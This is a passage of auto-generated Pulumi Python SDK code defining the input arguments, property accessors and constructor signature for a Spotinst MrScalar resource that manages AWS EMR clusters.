:param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
:param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]] steps_files: Steps from S3.
:param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]] tags: A list of tags to assign to the resource. You may define multiple tags.
:param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
:param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
:param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
:param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
:param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
:param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
if additional_info is not None:
pulumi.set(__self__, "additional_info", additional_info)
if additional_primary_security_groups is not None:
pulumi.set(__self__, "additional_primary_security_groups", additional_primary_security_groups)
if additional_replica_security_groups is not None:
pulumi.set(__self__, "additional_replica_security_groups", additional_replica_security_groups)
if applications is not None:
pulumi.set(__self__, "applications", applications)
if availability_zones is not None:
pulumi.set(__self__, "availability_zones", availability_zones)
if bootstrap_actions_files is not None:
pulumi.set(__self__, "bootstrap_actions_files", bootstrap_actions_files)
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if configurations_files is not None:
pulumi.set(__self__, "configurations_files", configurations_files)
if core_desired_capacity is not None:
pulumi.set(__self__, "core_desired_capacity", core_desired_capacity)
if core_ebs_block_devices is not None:
pulumi.set(__self__, "core_ebs_block_devices", core_ebs_block_devices)
if core_ebs_optimized is not None:
pulumi.set(__self__, "core_ebs_optimized", core_ebs_optimized)
if core_instance_types is not None:
pulumi.set(__self__, "core_instance_types", core_instance_types)
if core_lifecycle is not None:
pulumi.set(__self__, "core_lifecycle", core_lifecycle)
if core_max_size is not None:
pulumi.set(__self__, "core_max_size", core_max_size)
if core_min_size is not None:
pulumi.set(__self__, "core_min_size", core_min_size)
if core_scaling_down_policies is not None:
pulumi.set(__self__, "core_scaling_down_policies", core_scaling_down_policies)
if core_scaling_up_policies is not None:
pulumi.set(__self__, "core_scaling_up_policies", core_scaling_up_policies)
if core_unit is not None:
pulumi.set(__self__, "core_unit", core_unit)
if custom_ami_id is not None:
pulumi.set(__self__, "custom_ami_id", custom_ami_id)
if description is not None:
pulumi.set(__self__, "description", description)
if ebs_root_volume_size is not None:
pulumi.set(__self__, "ebs_root_volume_size", ebs_root_volume_size)
if ec2_key_name is not None:
pulumi.set(__self__, "ec2_key_name", ec2_key_name)
if expose_cluster_id is not None:
pulumi.set(__self__, "expose_cluster_id", expose_cluster_id)
if instance_weights is not None:
pulumi.set(__self__, "instance_weights", instance_weights)
if job_flow_role is not None:
pulumi.set(__self__, "job_flow_role", job_flow_role)
if keep_job_flow_alive is not None:
pulumi.set(__self__, "keep_job_flow_alive", keep_job_flow_alive)
if log_uri is not None:
pulumi.set(__self__, "log_uri", log_uri)
if managed_primary_security_group is not None:
pulumi.set(__self__, "managed_primary_security_group", managed_primary_security_group)
if managed_replica_security_group is not None:
pulumi.set(__self__, "managed_replica_security_group", managed_replica_security_group)
if master_ebs_block_devices is not None:
pulumi.set(__self__, "master_ebs_block_devices", master_ebs_block_devices)
if master_ebs_optimized is not None:
pulumi.set(__self__, "master_ebs_optimized", master_ebs_optimized)
if master_instance_types is not None:
pulumi.set(__self__, "master_instance_types", master_instance_types)
if master_lifecycle is not None:
pulumi.set(__self__, "master_lifecycle", master_lifecycle)
if master_target is not None:
pulumi.set(__self__, "master_target", master_target)
if name is not None:
pulumi.set(__self__, "name", name)
if output_cluster_id is not None:
pulumi.set(__self__, "output_cluster_id", output_cluster_id)
if provisioning_timeout is not None:
pulumi.set(__self__, "provisioning_timeout", provisioning_timeout)
if region is not None:
pulumi.set(__self__, "region", region)
if release_label is not None:
pulumi.set(__self__, "release_label", release_label)
if repo_upgrade_on_boot is not None:
pulumi.set(__self__, "repo_upgrade_on_boot", repo_upgrade_on_boot)
if retries is not None:
pulumi.set(__self__, "retries", retries)
if scheduled_tasks is not None:
pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
if security_config is not None:
pulumi.set(__self__, "security_config", security_config)
if service_access_security_group is not None:
pulumi.set(__self__, "service_access_security_group", service_access_security_group)
if service_role is not None:
pulumi.set(__self__, "service_role", service_role)
if steps_files is not None:
pulumi.set(__self__, "steps_files", steps_files)
if strategy is not None:
pulumi.set(__self__, "strategy", strategy)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if task_desired_capacity is not None:
pulumi.set(__self__, "task_desired_capacity", task_desired_capacity)
if task_ebs_block_devices is not None:
pulumi.set(__self__, "task_ebs_block_devices", task_ebs_block_devices)
if task_ebs_optimized is not None:
pulumi.set(__self__, "task_ebs_optimized", task_ebs_optimized)
if task_instance_types is not None:
pulumi.set(__self__, "task_instance_types", task_instance_types)
if task_lifecycle is not None:
pulumi.set(__self__, "task_lifecycle", task_lifecycle)
if task_max_size is not None:
pulumi.set(__self__, "task_max_size", task_max_size)
if task_min_size is not None:
pulumi.set(__self__, "task_min_size", task_min_size)
if task_scaling_down_policies is not None:
pulumi.set(__self__, "task_scaling_down_policies", task_scaling_down_policies)
if task_scaling_up_policies is not None:
pulumi.set(__self__, "task_scaling_up_policies", task_scaling_up_policies)
if task_unit is not None:
pulumi.set(__self__, "task_unit", task_unit)
if termination_policies is not None:
pulumi.set(__self__, "termination_policies", termination_policies)
if termination_protected is not None:
pulumi.set(__self__, "termination_protected", termination_protected)
if visible_to_all_users is not None:
warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
if visible_to_all_users is not None:
pulumi.set(__self__, "visible_to_all_users", visible_to_all_users)
@property
@pulumi.getter(name="additionalInfo")
def additional_info(self) -> Optional[pulumi.Input[str]]:
"""
This is meta information about third-party applications that third-party vendors use for testing purposes.
"""
return pulumi.get(self, "additional_info")
@additional_info.setter
def additional_info(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "additional_info", value)
@property
@pulumi.getter(name="additionalPrimarySecurityGroups")
def additional_primary_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the master node.
"""
return pulumi.get(self, "additional_primary_security_groups")
@additional_primary_security_groups.setter
def additional_primary_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_primary_security_groups", value)
@property
@pulumi.getter(name="additionalReplicaSecurityGroups")
def additional_replica_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the core and task nodes.
"""
return pulumi.get(self, "additional_replica_security_groups")
@additional_replica_security_groups.setter
def additional_replica_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_replica_security_groups", value)
@property
@pulumi.getter
def applications(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]:
"""
A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
"""
return pulumi.get(self, "applications")
@applications.setter
def applications(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]):
pulumi.set(self, "applications", value)
@property
@pulumi.getter(name="availabilityZones")
def availability_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of AZs and their subnet Ids. See example above for usage.
"""
return pulumi.get(self, "availability_zones")
@availability_zones.setter
def availability_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zones", value)
@property
@pulumi.getter(name="bootstrapActionsFiles")
def bootstrap_actions_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]:
"""
Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "bootstrap_actions_files")
@bootstrap_actions_files.setter
def bootstrap_actions_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]):
pulumi.set(self, "bootstrap_actions_files", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler cluster id.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="configurationsFiles")
def configurations_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]:
"""
Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "configurations_files")
@configurations_files.setter
def configurations_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]):
pulumi.set(self, "configurations_files", value)
@property
@pulumi.getter(name="coreDesiredCapacity")
def core_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in core group.
"""
return pulumi.get(self, "core_desired_capacity")
@core_desired_capacity.setter
def core_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_desired_capacity", value)
@property
@pulumi.getter(name="coreEbsBlockDevices")
def core_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your core group instances. Only a single block is allowed.
"""
return pulumi.get(self, "core_ebs_block_devices")
@core_ebs_block_devices.setter
def core_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]):
pulumi.set(self, "core_ebs_block_devices", value)
@property
@pulumi.getter(name="coreEbsOptimized")
def core_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "core_ebs_optimized")
@core_ebs_optimized.setter
def core_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "core_ebs_optimized", value)
@property
@pulumi.getter(name="coreInstanceTypes")
def core_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the core nodes.
"""
return pulumi.get(self, "core_instance_types")
@core_instance_types.setter
def core_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "core_instance_types", value)
@property
@pulumi.getter(name="coreLifecycle")
def core_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "core_lifecycle")
@core_lifecycle.setter
def core_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_lifecycle", value)
@property
@pulumi.getter(name="coreMaxSize")
def core_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in core group.
"""
return pulumi.get(self, "core_max_size")
@core_max_size.setter
def core_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_max_size", value)
@property
@pulumi.getter(name="coreMinSize")
def core_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in core group.
"""
return pulumi.get(self, "core_min_size")
@core_min_size.setter
def core_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_min_size", value)
@property
@pulumi.getter(name="coreScalingDownPolicies")
def core_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]:
return pulumi.get(self, "core_scaling_down_policies")
@core_scaling_down_policies.setter
def core_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]):
pulumi.set(self, "core_scaling_down_policies", value)
@property
@pulumi.getter(name="coreScalingUpPolicies")
def core_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]:
return pulumi.get(self, "core_scaling_up_policies")
@core_scaling_up_policies.setter
def core_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]):
pulumi.set(self, "core_scaling_up_policies", value)
@property
@pulumi.getter(name="coreUnit")
def core_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "core_unit")
@core_unit.setter
def core_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_unit", value)
@property
@pulumi.getter(name="customAmiId")
def custom_ami_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
"""
return pulumi.get(self, "custom_ami_id")
@custom_ami_id.setter
def custom_ami_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "custom_ami_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ebsRootVolumeSize")
def ebs_root_volume_size(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "ebs_root_volume_size")
@ebs_root_volume_size.setter
def ebs_root_volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ebs_root_volume_size", value)
@property
@pulumi.getter(name="ec2KeyName")
def ec2_key_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of an Amazon EC2 key pair that can be used to ssh to the master node.
"""
return pulumi.get(self, "ec2_key_name")
@ec2_key_name.setter
def ec2_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ec2_key_name", value)
@property
@pulumi.getter(name="exposeClusterId")
def expose_cluster_id(self) -> Optional[pulumi.Input[bool]]:
"""
Allow the `cluster_id` to set a provider output variable.
"""
return pulumi.get(self, "expose_cluster_id")
@expose_cluster_id.setter
def expose_cluster_id(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "expose_cluster_id", value)
@property
@pulumi.getter(name="instanceWeights")
def instance_weights(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]:
"""
Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
"""
return pulumi.get(self, "instance_weights")
@instance_weights.setter
def instance_weights(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]):
pulumi.set(self, "instance_weights", value)
@property
@pulumi.getter(name="jobFlowRole")
def job_flow_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
"""
return pulumi.get(self, "job_flow_role")
@job_flow_role.setter
def job_flow_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "job_flow_role", value)
@property
@pulumi.getter(name="keepJobFlowAlive")
def keep_job_flow_alive(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the cluster should remain available after completing all steps.
"""
return pulumi.get(self, "keep_job_flow_alive")
@keep_job_flow_alive.setter
def keep_job_flow_alive(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "keep_job_flow_alive", value)
@property
@pulumi.getter(name="logUri")
def log_uri(self) -> Optional[pulumi.Input[str]]:
"""
The path to the Amazon S3 location where logs for this cluster are stored.
"""
return pulumi.get(self, "log_uri")
@log_uri.setter
def log_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "log_uri", value)
@property
@pulumi.getter(name="managedPrimarySecurityGroup")
def managed_primary_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the primary instance group.
"""
return pulumi.get(self, "managed_primary_security_group")
@managed_primary_security_group.setter
def managed_primary_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_primary_security_group", value)
@property
@pulumi.getter(name="managedReplicaSecurityGroup")
def managed_replica_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the replica instance group.
"""
return pulumi.get(self, "managed_replica_security_group")
@managed_replica_security_group.setter
def managed_replica_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_replica_security_group", value)
@property
@pulumi.getter(name="masterEbsBlockDevices")
def master_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your master group instances. Only a single block is allowed.
"""
return pulumi.get(self, "master_ebs_block_devices")
@master_ebs_block_devices.setter
def master_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]):
pulumi.set(self, "master_ebs_block_devices", value)
@property
@pulumi.getter(name="masterEbsOptimized")
def master_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "master_ebs_optimized")
@master_ebs_optimized.setter
def master_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "master_ebs_optimized", value)
@property
@pulumi.getter(name="masterInstanceTypes")
def master_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the master nodes.
"""
return pulumi.get(self, "master_instance_types")
@master_instance_types.setter
def master_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "master_instance_types", value)
@property
@pulumi.getter(name="masterLifecycle")
def master_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "master_lifecycle")
@master_lifecycle.setter
def master_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_lifecycle", value)
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> Optional[pulumi.Input[int]]:
"""
Number of instances in the master group.
"""
return pulumi.get(self, "master_target")
@master_target.setter
def master_target(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "master_target", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The application name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="outputClusterId")
def output_cluster_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "output_cluster_id")
@output_cluster_id.setter
def output_cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "output_cluster_id", value)
@property
@pulumi.getter(name="provisioningTimeout")
def provisioning_timeout(self) -> Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]:
return pulumi.get(self, "provisioning_timeout")
@provisioning_timeout.setter
def provisioning_timeout(self, value: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]):
pulumi.set(self, "provisioning_timeout", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler region.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="releaseLabel")
def release_label(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "release_label")
@release_label.setter
def release_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "release_label", value)
@property
@pulumi.getter(name="repoUpgradeOnBoot")
def repo_upgrade_on_boot(self) -> Optional[pulumi.Input[str]]:
"""
Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
"""
return pulumi.get(self, "repo_upgrade_on_boot")
@repo_upgrade_on_boot.setter
def repo_upgrade_on_boot(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repo_upgrade_on_boot", value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
"""
return pulumi.get(self, "retries")
@retries.setter
def retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retries", value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]:
"""
An array of scheduled tasks.
"""
return pulumi.get(self, "scheduled_tasks")
@scheduled_tasks.setter
def scheduled_tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]):
pulumi.set(self, "scheduled_tasks", value)
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> Optional[pulumi.Input[str]]:
"""
The name of the security configuration applied to the cluster.
"""
return pulumi.get(self, "security_config")
@security_config.setter
def security_config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_config", value)
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> Optional[pulumi.Input[str]]:
"""
The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
"""
return pulumi.get(self, "service_access_security_group")
@service_access_security_group.setter
def service_access_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_access_security_group", value)
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
"""
return pulumi.get(self, "service_role")
@service_role.setter
def service_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_role", value)
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]:
"""
Steps from S3.
"""
return pulumi.get(self, "steps_files")
@steps_files.setter
def steps_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]):
pulumi.set(self, "steps_files", value)
@property
@pulumi.getter
def strategy(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
"""
return pulumi.get(self, "strategy")
@strategy.setter
def strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "strategy", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]:
"""
A list of tags to assign to the resource. You may define multiple tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in task group.
"""
return pulumi.get(self, "task_desired_capacity")
@task_desired_capacity.setter
def task_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_desired_capacity", value)
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your task group instances. Only a single block is allowed.
"""
return pulumi.get(self, "task_ebs_block_devices")
@task_ebs_block_devices.setter
def task_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]):
pulumi.set(self, "task_ebs_block_devices", value)
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "task_ebs_optimized")
@task_ebs_optimized.setter
def task_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "task_ebs_optimized", value)
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the task nodes.
"""
return pulumi.get(self, "task_instance_types")
@task_instance_types.setter
def task_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "task_instance_types", value)
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "task_lifecycle")
@task_lifecycle.setter
def task_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_lifecycle", value)
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in task group.
"""
return pulumi.get(self, "task_max_size")
@task_max_size.setter
def task_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_max_size", value)
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in task group.
"""
return pulumi.get(self, "task_min_size")
@task_min_size.setter
def task_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_min_size", value)
@property
@pulumi.getter(name="taskScalingDownPolicies")
def task_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]:
return pulumi.get(self, "task_scaling_down_policies")
@task_scaling_down_policies.setter
def task_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]):
pulumi.set(self, "task_scaling_down_policies", value)
@property
@pulumi.getter(name="taskScalingUpPolicies")
def task_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]:
return pulumi.get(self, "task_scaling_up_policies")
@task_scaling_up_policies.setter
def task_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]):
pulumi.set(self, "task_scaling_up_policies", value)
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "task_unit")
@task_unit.setter
def task_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_unit", value)
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]:
"""
Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
"""
return pulumi.get(self, "termination_policies")
@termination_policies.setter
def termination_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]):
pulumi.set(self, "termination_policies", value)
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
return pulumi.get(self, "termination_protected")
@termination_protected.setter
def termination_protected(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "termination_protected", value)
@property
@pulumi.getter(name="visibleToAllUsers")
def visible_to_all_users(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "visible_to_all_users")
@visible_to_all_users.setter
def visible_to_all_users(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "visible_to_all_users", value)
class MrScalar(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
